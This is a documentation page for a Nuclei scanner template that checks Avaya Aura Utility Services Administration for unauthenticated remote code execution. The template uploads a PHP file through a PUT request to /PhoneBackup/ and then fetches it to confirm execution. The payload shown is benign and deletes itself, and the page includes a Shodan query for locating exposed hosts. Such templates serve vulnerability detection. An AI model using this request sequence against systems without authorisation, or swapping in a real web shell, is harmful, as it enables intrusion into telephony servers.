Skip to content
Nuclei Templates

Avaya Aura Utility Services Administration - Remote Code Execution

ID: avaya-aura-rce

Severity: critical

Author: DhiyaneshDk

Tags: rce,avaya,aura,iot,intrusive

Description

Section titled “Description”

Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: avaya-aura-rce


info:
  name: Avaya Aura Utility Services Administration - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"Avaya Aura"
  tags: rce,avaya,aura,iot,intrusive


http:
  - raw:
      - |
        PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close


        <?php print('avaya-aura-rce');unlink(__FILE__);
      - |
        GET /PhoneBackup/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA
        Connection: close


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 201"
          - 'contains(body_2, "avaya-aura-rce")'
        condition: and
# digest: 4b0a00483046022100acf645cea247296afd0838e2239760b07e882de494f3eedf2759dde0ab88edab022100cbb7aee960774b858726959d4efb21c7356b15104cf406713c347d2c27df531d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/avaya/avaya-aura-rce.yaml"

View on Github